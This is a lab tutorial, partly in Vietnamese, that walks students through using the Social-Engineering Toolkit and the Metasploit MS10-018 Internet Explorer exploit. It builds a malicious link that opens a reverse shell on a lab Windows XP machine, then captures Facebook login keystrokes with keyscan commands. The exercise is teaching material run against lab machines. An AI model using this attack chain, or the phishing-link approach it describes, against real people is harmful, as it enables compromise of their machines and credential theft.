Hướng Dẫn Thực Hành - (Social Engineering Toolkit (SET): Lesson 2

{ Create Malicious Weblink to Sniff Victim's Keystrokes }

---

Section 0. Background Information

• What is the Social-Engineering Toolkit (SET)
  • The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing.
  • It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
  • Social-Engineering toolkit available on backtrack like on backtrack 5, backbox, blackbuntu, Gnacktrack and other Linux distribution that are used for penetration testing.
• Social Engineering Note
  • Image an attacker embedding the malicious link   in an email to a possible victim.
  • The Victim does not inspect the link before he clicks on it to notice that the link is an IP Address instead of a domain name.  In addition the IP Address is listening on a different port. 
    • (ie., http://192.168.1.105:8080) 
  • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize that the following has occurred:
    1. A Metasploit payload was injected to their system
    2. A Metasploit session is attached to their system
    3. The attached session was migrated from iexplorer.exe to notpad.exe.

Section 1. Configure BackTrack Virtual Machine Settings

1. Open Your VMware Player
   • Instructions:
     1. On Your Host Computer, Go To
     2. Start --> All Program --> VMWare --> VMWare Player
2. Edit BackTrack Virtual Machine Settings
   • Instructions:
     1. Highlight BackTrack5R1
     2. Click Edit virtual machine settings
   • 
3. Edit Network Adapter
• Instructions:
  1. Highlight Network Adapter
  2. Select Bridged
  3. Do not Click on the OK Button.
• 

Section 2. Login to BackTrack

1. Start BackTrack VM Instance
   • Instructions:
     1. Start Up VMWare Player
     2. Select BackTrack5R1
     3. Play virtual machine
   • 
2. Login to BackTrack
   • Instructions:
     1. Login: root
     2. Password: toor or <whatever you changed it to>.
   • 
3. Bring up the GNOME
   • Instructions:
     1. Type startx
   • 

Section 3. Open Console Terminal and Retrieve IP Address

1. Open a console terminal
   • Instructions:
     1. Click on the console terminal
   • 
2. Get IP Address
   • Instructions:
     1. ifconfig -a
   • Notes:
     • As indicated below, my IP address is 192.168.1.105.
     • Please record your IP address.
   • 

Section 4. Start the Social Engineering ToolKit

1. Start Social Engineering ToolKit
   • Instructions:
     1. cd /pentest/exploits/set
     2. ./set
   • 
2. Website Attack Vector
   • Instructions:
     1. Select 2
   • 
3. Select Metasploit Browser Exploit Method
   • Instructions:
     1. Select 2
   • 
4. Select Web Templates
   • Instructions:
     1. Select 1
   • 
5. Set Web Attack
   • Instructions:
     1. Select 3
   • 
6. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
   • Instructions:
     1. Select 15
   • 
7. Windows Shell Reverse_TCP
   • Instructions:
     1. Select 1
   • 
8. Set Reverse Port
   • Instructions:
     1. Set to 5555
   • 
9. Waiting for the server to start
   • Instructions:
     1. Copy the weblink that is listed above the Server started line.
     2. Continue to the next section.
   • Notes:
     • This is the malicious weblink that will be used by the attacker to to social engineer their way into the victim's machine.
   • 

Section 5. Start Up Windows Machine

• Social Engineering Note
  • Image how an attacker could embed the malicious link provided in Section 4, Step 9 in an email to a possible victim.
  • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.

1. Start Up Damn Vulnerable WXP-SP2.
   • Instructions:
     1. Click on Damn Vulnerable WXP-SP2
     2. Click on Edit virtual machine Settings
   • Note(FYI):
     • For those of you not part of my class, this is a Windows XP machine running SP2.
   • 
2. Edit Virtual Machine Settings
   • Instructions:
     1. Click on Network Adapter
     2. Click on the Bridged Radio button
     3. Click on the OK Button
   • 
3. Play Virtual Machine
   • Instructions:
     1. Click on Damn Vulnerable WXP-SP2
     2. Click on Play virtual machine
   • 
4. Logging into Damn Vulnerable WXP-SP2.
   • Instructions:
     1. Username: administrator
     2. Password: Use the Class Password or whatever you set it.
   • 
5. Open a Command Prompt
   • Instructions:
     1. Start --> All Programs --> Accessories --> Command Prompt
   • 
6. Obtain Damn Vulnerable WXP-SP2's IP Address
   • Instructions:
     1. ipconfig
   • Note(FYI):
     • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
     • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
     • Record your Damn Vulnerable WXP-SP2's IP Address.
   • 
    

Section 6. Start Up a Web Browser

1. Start Up Internet Explorer
   • Instructions:
     1. Start --> All Programs --> Internet Explorer
   • 
2. Victim Clicks on Link
   • Instructions:
     1. Place the BackTrack IP in the Address Bar.
        • In my case, http://192.168.1.105:8080/
        • In your case, get the IP address from Section 5, Step 9.
   • Note(FYI):
     • The Web Browser will just crash.
   • 

Section 7. Analyzing Results After Web Browser Crash

1. Start up a Command Prompt
   • Instructions:
     1. All Programs --> Accessories --> Command Prompt
   • 
2. Start up a Command Prompt
   • Instructions:
     1. netstat -nao | findstr 5555
     2. tasklist | findstr 2976
        • 2976 is the process ID for the Metasploit session running on port 5555.
        • In your case, the process ID will probably be different.
     3. tasklist | findstr notepad
   • Proof of Lab Instructions: (có thể bỏ qua bước này)
     1. date
     2. echo "Your Name"
        1. Where the string "Your Name" is your actual name.
        2. e.g., echo "Nguyen Tuong Minh"
     3. Do a PrtScn
     4. Paste into a word document
   • 

Section 8. Entering the Victim's Machine

1. Get a MSF Prompt
   • Instructions:
     1. Press <Enter>, when you see the notepad.exe line.
   • 
2. Obtain the Victim's Command Prompt
   • Instructions:
     1. sessions
     2. sessions -i 1
     3. execute -f cmd.exe -i -M
   • 
3. Start the keystroke sniffer
   • Instructions:
     1. Press the <Ctrl> and "z" key at the same time.
        • This will put session 1 into the background.
     2. y
     3. keyscan_start
     4. Continue to next Section.
   • 

Section 9. Login to Facebook

1. Start Up Internet Explorer
   • Instructions:
     1. Start --> All Programs --> Internet Explorer
   • 
    
2. Login into Facebook
   • Instructions:
     1. Email: Use a fake address
        • first.last@victim.com, where first is your first name and last is your last name.
        • e.g., john.gray@victim.com
     2. Password: Use whatever you want.
   • 

Section 10. Review sniffed keystrokes

1. Exit Web Attack Menu
   • Instructions:
     1. keyscan_dump
        • This will proceduce the Facebook
     2. keyscan_stop
   • Proof of Lab Instructions #2:
     1. Do a PrtScan
     2. Paste into same word document that contains proof of lab #1.
   •